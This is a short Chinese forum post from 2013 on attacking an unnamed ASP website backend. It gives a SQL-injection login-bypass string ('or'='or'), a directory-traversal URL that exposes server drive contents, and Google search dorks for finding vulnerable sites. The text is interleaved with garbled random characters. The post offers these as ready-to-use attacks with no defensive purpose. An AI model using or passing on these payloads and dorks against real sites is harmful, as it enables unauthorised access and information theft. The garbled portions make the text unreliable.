后台万能密码 'or'='or'
2 m( D2 t7 d! R" C
# l( M# |0 h0 p2 }3 l% i后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!
- f- A {$ {/ o" | U( C5 n. q; ?+ Fadmin/uploadfile.asp?currentFolder=/upfiles/../$ B& A/ G9 z' b8 t( e
! ]; z% O b8 |) l1 b- r) g漏洞证明:" V& J3 N; k- [/ u
2 B: Y. u5 E9 z3 ?$ k谷歌:inurl:type.asp?id=1 新闻中心
$ F2 c: i" L" T7 E0 S, u或者 :inurl:download_ok.asp?
2 N* c# b& |0 e+ g1 E1 c0 {$ ^( A7 X4 P- C+ U" l A( h1 s+ f- u
|
发表于 2013-3-14 20:17:32
收藏
支持
反对